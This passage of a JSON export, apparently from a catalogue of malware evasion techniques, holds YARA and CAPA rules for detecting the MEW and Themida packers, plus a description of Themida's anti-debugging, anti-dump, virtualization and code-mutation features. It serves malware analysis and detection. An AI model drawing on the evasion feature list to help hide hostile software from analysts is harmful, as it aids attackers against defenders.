00 }\r\n        $b = { E9 ?? ?? ?? ?? 0C ?? ?? ?? 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_02_MEW_11_SE_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 0C ?? ?? ?? 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v11: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v12: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MEW_11_SE_11_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 00 00 00 02 00 00 00 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_501_NorthFox_HCC: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 ?? 04 ?? C0 C8 ?? AA E2 F4 C3 00 ?? ?? 00 ?? ?? ?? 00 00 10 40 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D }\r\n        $b = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 ?? 04 ?? C0 C8 ?? AA E2 F4 C3 00 ?? ?? 00 ?? ?? ?? 00 00 10 40 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PseudoSigner_02_MEW_11_SE_10: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_v10_Eng_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v12_NorthfoxHCC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_11_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 0C ?? ?? ?? 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_11_SE_v12_Eng_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_10_packer_v10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_10_by_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v11_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_MEW_11_SE_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_11_SE_v12_Eng_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 06 1E 52 B8 ?? ?? 1E CD 21 86 E0 3D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v12_NorthfoxHCC: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_MEW_11_SE_10: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_MEW_11_SE_10: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_5_10_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 48 01 ?? ?? ?? ?? ?? 95 A5 33 C0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v12_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD FF FF FF 38 E8 E3 FF FF FF 66 E8 0D 00 00 00 04 E8 E3 FF FF FF 70 E8 CB FF FF FF 69 E8 DD FF FF FF 58 E8 DD FF FF FF 69 E8 E3 FF FF FF 79 E8 BF FF FF FF 69 83 C4 40 E8 00 00 00 00 5D 81 ED 9D 11 40 00 8D 95 B4 11 40 00 E8 CB 2E 00 00 33 C0 F7 F0 69 8D B5 05 12 40 00 B9 5D 2E 00 00 8B FE AC }\r\n        $b = { EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD FF FF FF 38 E8 E3 FF FF FF 66 E8 0D 00 00 00 04 E8 E3 FF FF FF 70 E8 CB FF FF FF 69 E8 DD FF FF FF 58 E8 DD FF FF FF 69 E8 E3 FF FF FF 79 E8 BF FF FF FF 69 83 C4 40 E8 00 00 00 00 5D 81 ED 9D 11 40 00 8D 95 B4 11 40 00 E8 CB 2E 00 00 33 C0 F7 F0 69 8D B5 05 12 40 00 B9 5D 2E 00 00 8B FE AC }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MEW_5_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? AD 91 AD 93 53 AD 96 56 5F AC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_MEW_11_SE_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_MEW_11_SE_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v11_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 0C ?? ?? ?? 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 00 00 00 02 00 00 00 0C ?0 }\r\n        $b = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Mew_501_NorthFox_HCC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 ?? 04 ?? C0 C8 ?? AA E2 F4 C3 00 ?? ?? 00 ?? ?? ?? 00 00 10 40 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_10_by_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_exe_coder_10_Northfox_HCC: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF 6A ?? ?? ?? ?? ?? 70 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_v10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v11_Northfox_HCC: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C }\r\n        $b = { E9 ?? ?? ?? FF 0C ?0 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MEW_11_SE_v12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_exe_coder_10_Northfox_HCC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF 6A ?? ?? ?? ?? ?? 70 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 00 00 00 02 00 00 00 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_5_10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_v10_Eng_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v11_Northfox_HCC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 187,
            "unprotect_id": "U1406",
            "name": "Themida",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "Themida is a commercial known packer that embeds several features including anti-debugging, virtual machine emulation, encryption... \r\n\r\n- Anti-debugger techniques that detect/fool any kind of debugger\r\n\r\n- Anti-memory dumpers techniques for any Ring3 and Ring0 dumpers\r\n\r\n- Different encryption algorithms and keys in each protected application\r\n\r\n- Anti-API scanners techniques that avoids reconstruction of original import table\r\n\r\n- Automatic decompilation and scrambling techniques in target application\r\n\r\n- Virtual Machine emulation in specific blocks of code\r\n\r\n- Advanced Mutator engine\r\n\r\n- Anti-disassembly techniques for any static and interactive disassembler\r\n\r\n- Multiple polymorphic layers with more than 50.000 permutations\r\n\r\n- Anti-monitors techniques against file and registry monitors\r\n\r\n- Random garbage code insertion between real instructions\r\n\r\n- Advanced Threads network communication\r\n\r\n- Anti-Memory patching and CRC techniques in target application\r\n\r\n- Metamorphic engine to scramble original instructions\r\n\r\n- Advanced Entry point protection\r\n\r\n- Dynamic encryption in target application\r\n\r\n- Anti-tracing code insertion between real instructions\r\n\r\n- Advanced Anti-breakpoint manager\r\n\r\n- Real time protection in target application\r\n\r\n- Compression of target application, resources and protection code\r\n\r\n- Anti-“debugger hiders” techniques\r\n\r\n- Full mutation in protection code to avoid pattern recognition\r\n\r\n- Real-time simulation in target application\r\n\r\n- Intelligent protection code insertion inside target application\r\n\r\n- Random internal data relocation",
            "resources": "https://www.oreans.com/Themida.php",
            "tags": "themida",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 98,
                    "key": "capa_detect_themida",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_Themida",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with Themida\r\n    namespace: anti-analysis/packer/themida\r\n    authors:\r\n      - william.ballenthin@mandiant.com\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing::Themida [F0001.011]\r\n    references:\r\n      - https://www.hexacorn.com/blog/2016/12/15/pe-section-names-re-visited/\r\n    examples:\r\n      - 8a132663bee5c2f0f5cbfebee1b55ac72934632bf32bc32d6e2dae797c9e6e35\r\n      - 2826b762b9c268601a44974ef469a671b441e798a6c3cbb40070450c6c030ba2\r\n  features:\r\n    - or:\r\n      - section: Themida\r\n      - section: .Themida\r\n      - section: .themida\r\n      - section: WinLicen\r\n      - section: .winlice\r\n      - count(section(        )): 2 or more\r\n        description: Section names containing 8 space characters observed in Themida 3.0.x packed files\r\n      - and:\r\n        - description: Section names containing 3 and 8 space characters observed in Themida 2.1.x packed files\r\n        - section: \"   \"\r\n        - section: \"        \""
                },
                {
                    "id": 105,
                    "key": "yara_detect_themida",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Themida",
                    "rule": "rule ThemidaWinLicense_V1X_Oreans_Technologies_SignByfly: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 43 4F 4D 43 54 4C 33 32 2E 64 6C 6C 00 00 00 49 6E 69 74 43 6F 6D 6D 6F 6E 43 6F 6E 74 72 6F 6C 73 00 00 00 00 00 00 }\r\n        $b = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 43 72 65 61 74 65 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V19X_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 05 89 48 01 61 E9 }\r\n        $b = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_1201_compressed_Oreans_Technologies_h: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_18xx_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V10X_V17X_DLL_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? ?? ?? ?? 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V19X_DLL_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 05 89 48 01 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_10xx_18xx_no_compression_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1820_p_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule themida_1005_httpwwworeanscom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_10xx_18xx_no_compression_Oreans_Technologies_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 }\r\n        $b = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ThemidaWinLicense_V2010_p_Hide_from_PE_scanners_Type2: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1201_compressed_Oreans_Technologies_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? 00 03 C7 B9 ?? ?? ?? 00 03 CF EB 0A B8 ?? ?? ?? ?? B9 5A ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D 26 00 00 00 B9 EF 01 00 00 C6 00 E9 83 E9 05 89 48 01 61 E9 AF 01 00 00 02 00 00 00 91 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1X_NoCompression_SecureEngine_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 ?? ?? ?? ?? 00 00 00 00 00 